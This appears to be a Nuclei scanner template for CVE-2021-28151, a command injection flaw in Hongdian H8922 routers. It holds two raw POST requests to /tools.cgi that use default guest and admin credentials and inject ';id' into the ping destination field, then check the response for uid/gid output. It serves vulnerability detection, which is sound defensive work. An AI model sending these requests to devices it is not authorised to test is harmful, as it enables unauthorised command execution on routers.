id: CVE-2021-28151 info: name: Hongdian Command Injection author: gy741 severity: high description: | Hongdian H8922 3.0.5 devices allow OS command injection via shell metacharacters into the ip-address (aka Destination) field to the tools.cgi ping command, which is accessible with the username guest and password guest. reference: | - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2021-28151 tags: cve,cve2021,hongdian,rce requests: - raw: - | POST /tools.cgi HTTP/1.1 Host: {{Hostname}} Content-Length: 85 Cache-Control: max-age=0 Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= Upgrade-Insecure-Requests: 1 Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://{{Hostname}}/tools.cgi Accept-Encoding: gzip, deflate Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close op_type=ping&destination=%3Bid - | POST /tools.cgi HTTP/1.1 Host: {{Hostname}} Content-Length: 85 Cache-Control: max-age=0 Authorization: Basic YWRtaW46YWRtaW4= Upgrade-Insecure-Requests: 1 Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://{{Hostname}}/tools.cgi Accept-Encoding: gzip, deflate Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close op_type=ping&destination=%3Bid matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "text/html" part: header - type: word words: - "uid=" - "gid=" part: body condition: and